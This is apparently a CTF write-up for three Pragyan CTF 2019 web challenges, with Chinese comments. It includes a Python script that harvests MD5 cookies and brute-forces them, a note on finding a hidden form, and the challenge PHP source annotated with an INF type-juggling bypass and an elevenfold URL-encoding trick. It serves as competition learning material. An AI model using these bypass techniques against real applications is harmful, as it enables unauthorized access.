Pragyan CTF19 webwp

Do prepare to see cookies lurking everywhere. http://159.89.166.12:13500/

import requests
import hashlib
from itertools import *
import string
flag = []
wordlist = string.printable

s = requests.session()
for i in range(40):
    cookie = s.get('http://159.89.166.12:13500/').cookies['flag']
    flag.append(cookie)
print (flag)

result= []
for i in flag:
    for j in permutations(wordlist,2):
        guess = "".join(j)
        md5 = hashlib.md5(guess.encode("utf8")).hexdigest()
        if md5 ==i:
            result.append(guess)
            break
print (result)

Game of Faces 100

The Game of Faces, welcomes you. In this era, where AIs generate a lot of faces, we would like you to contribute to the same by uploading your image. Thank you for contributing, to continue.

http://159.89.166.12:15000/

1
2

把css删掉，发现一个假的提交，得到一个base64，解码得The_scroll_says=the_night_kingVSvalyrian.txt，然后直接访问。。。
http://159.89.166.12:15000/the_night_kingVSvalyrian.txt

Mandatory PHP 125

PHP, PHP everywhere get the flag and earn your points there.

http://159.89.166.12:14000/

<?php 
include 'flag.php'; 
highlight_file('index.php'); 
$a = $_GET["val1"]; 
$b = $_GET["val2"]; 
$c = $_GET["val3"]; 
$d = $_GET["val4"]; 
if(preg_match('/[^A-Za-z]/', $a)) 
die('oh my gawd...'); 
$a=hash("sha256",$a); 
$a=(log10($a**(0.5)))**2;  //传入 $a='pp';会发现 float(INF) php
if($c>0&&$d>0&&$d>$c&&$a==$c*$c+$d*$d) //这里也传入无限大
$s1="true"; 
else 
    die("Bye..."); 
if($s1==="true") 
    echo $flag1; 
for($i=1;$i<=10;$i++){ 
    if($b==urldecode($b))  //编码11次
        die('duck'); 
    else 
        $b=urldecode($b); 
}     
if($b==="WoAHh!") 
$s2="true"; 
else 
    die('oops..'); 
if($s2==="true") 
    echo $flag2; 
die('end...'); 
?>